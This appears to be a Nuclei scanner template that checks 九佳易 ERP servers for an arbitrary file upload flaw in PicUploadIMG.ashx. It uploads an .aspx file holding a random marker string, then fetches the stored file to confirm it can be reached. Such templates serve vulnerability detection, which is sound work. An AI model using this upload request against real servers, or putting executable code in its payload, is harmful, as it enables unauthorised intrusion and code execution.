id: jiujiayiERP-PicUploadIMG-upload

info:
  name: 九佳易ERP PicUploadIMG.ashx 存在任意文件上传漏洞
  author: jiujiayiERP
  severity: high
  tags: jiujiayiERP

http:
  - raw:
      - |
        POST /weshop/Comm/PicUploadIMG.ashx?curTplb=001 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJ7jrM31JCYae3wBT

        ------WebKitFormBoundaryJ7jrM31JCYae3wBT
        Content-Disposition: form-data; name="Filedata"; filename="test.aspx"
        
        {{randstr}}
        ------WebKitFormBoundaryJ7jrM31JCYae3wBT--

      - |+
        GET /weshoppics{{paths}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Encoding: gzip, deflate

    extractors:
      - type: regex
        part: body
        name: paths
        regex:
          - '/weshoppics(.*?\.aspx)'
        internal: true
        group: 1

    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body_2
        words:
          - '{{randstr}}'
    matchers-condition: and
